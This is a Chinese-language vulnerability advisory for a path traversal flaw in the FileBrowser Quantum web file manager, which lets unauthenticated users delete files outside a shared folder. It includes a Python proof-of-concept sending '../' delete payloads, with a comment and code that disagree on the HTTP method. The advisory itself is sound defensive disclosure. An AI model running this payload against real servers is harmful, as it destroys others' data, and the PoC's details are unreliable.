CVE-2026-44542 CVSS 9.1 严重

CVE-2026-44542 FileBrowser路径穿越漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44542

漏洞类型

路径穿越

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FileBrowser Quantum

漏洞概述

FileBrowser Quantum是一款免费的自托管Web文件管理器。在1.3.1-stable和1.3.9-beta版本之前，该软件存在严重的路径遍历漏洞。由于程序在清理用户输入之前，就将攻击者控制的路径与受信任的基础路径进行了拼接，导致攻击者可以利用遍历序列（如../）逃逸预期的共享目录。未经身份验证的攻击者只要拥有一个启用了删除权限的有效公共共享哈希，就可以在共享所有者配置的存储范围内，删除共享目录之外的任意文件。该漏洞影响了`public/api/resources`和`public/api/resources/bulk`接口，对系统完整性和可用性构成重大威胁。

技术细节

该漏洞的根源在于不安全的路径拼接逻辑。在通常的安全开发规范中，应当先对用户输入的路径进行标准化和清洗（例如解析`..`、`.`等符号并限制在根目录内），然后再将其与基础目录路径进行操作。然而，FileBrowser Quantum的受影响版本中，代码逻辑存在缺陷，直接将未经验证的用户输入与基础路径合并。这种逻辑使得攻击者可以通过在输入字段中注入`../`序列，向上遍历目录树。由于验证机制失效，攻击者能够绕过目录限制。攻击者无需登录系统，仅需获取到一个开启了删除权限的公共分享链接，即可通过构造恶意请求删除服务器上的敏感文件，导致数据丢失或系统瘫痪。

攻击链分析

STEP 1

侦察

攻击者寻找FileBrowser Quantum实例，并获取一个启用了删除权限的有效公共分享链接。

STEP 2

漏洞利用

攻击者构造包含路径遍历序列（../）的恶意数据包，发送至`public/api/resources`或`public/api/resources/bulk`接口，试图访问共享目录外的文件。

STEP 3

执行攻击

服务器在未正确清洗输入的情况下拼接路径，执行删除操作，导致共享目录之外的指定文件被系统删除。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "http://localhost:8080"
public_share_hash = "VALID_PUBLIC_SHARE_HASH_HERE" 

# The vulnerable endpoint for deleting resources
url = f"{target_host}/public/api/resources"

# Headers simulating an unauthenticated user with a share hash
headers = {
    "X-Share-Hash": public_share_hash,
    "Content-Type": "application/json"
}

# Payload demonstrating path traversal
# The attacker inputs "../../sensitive_config.ini" to escape the shared folder
payload = {
    "items": [
        {
            "path": "../../../../sensitive_config.ini",
            "action": "delete"
        }
    ]
}

try:
    # Sending the DELETE request to exploit the vulnerability
    response = requests.post(url, json=payload, headers=headers)
    
    if response.status_code == 200:
        print("[+] Exploit successful! File deleted.")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(f"Response: {response.text}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

FileBrowser Quantum < 1.3.1-stable

FileBrowser Quantum < 1.3.9-beta

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用FileBrowser的公共分享功能，或者确保所有公共分享链接均未开启“删除”权限。同时，可在Web应用防火墙（WAF）上部署规则，拦截API请求中包含“../”或“..\”等路径遍历字符的流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表